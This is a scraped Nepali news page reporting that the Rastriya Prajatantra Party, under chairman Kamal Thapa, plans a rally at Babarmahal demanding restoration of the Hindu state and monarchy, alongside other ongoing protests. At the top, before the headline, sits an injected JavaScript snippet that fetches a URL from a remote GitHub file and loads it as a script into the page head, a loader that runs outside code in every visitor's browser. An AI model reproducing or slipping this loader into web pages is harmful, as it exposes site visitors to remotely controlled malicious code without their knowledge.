;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); हिन्दुराष्ट्र र राजसंस्था पुनःस्थापना माग गर्दै भोली राप्रपाले प्रर्दश गर्ने – जुनेली न्युज
बिहिबार, साउन ३, २०८२
  • होमपेज
  • हिन्दुराष्ट्र र राजसंस्था पुनःस्थापना माग गर्दै भोली राप्रपाले प्रर्दश गर्ने
देश/प्रदेश

हिन्दुराष्ट्र र राजसंस्था पुनःस्थापना माग गर्दै भोली राप्रपाले प्रर्दश गर्ने

पुष १०,

काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टी (राप्रपा) ले भोली शनिबार हिन्दुराष्ट्र र राजसंस्था पुनःस्थापना अभियानमा प्रर्दशन गर्ने भएको छ ।

बिहान ११:३० बजे बबरमहलमा प्रर्दशन गर्ने राप्रपाका अध्यक्ष कमल थापाले जानकारी दिए । मोटरसाइकल र्‍यालीसहित बृहत प्रर्दशनको तयारी गरेको थापाले जानकारी दिए ।

हाल विभिन्न कारण देशका विभिन्न ठाउँमा बिरोध भैरहेको छ । उखुका किसान १२ दिनदेखि प्रर्दशन गर्दै आएका छन्। त्यस्तै नेकपाकै प्रचण्ड- नेपाल समूहले शुक्रबार काठमाडौंमा प्रर्दशन गरेको थियो । १४ गते पुषमा देशब्यापी प्रर्दशन गर्दै छ । कांग्रेसले आउदो १३ गते देशब्यापी प्रर्दशन गर्दै छ ।

फेसबुक प्रतिक्रियाहरु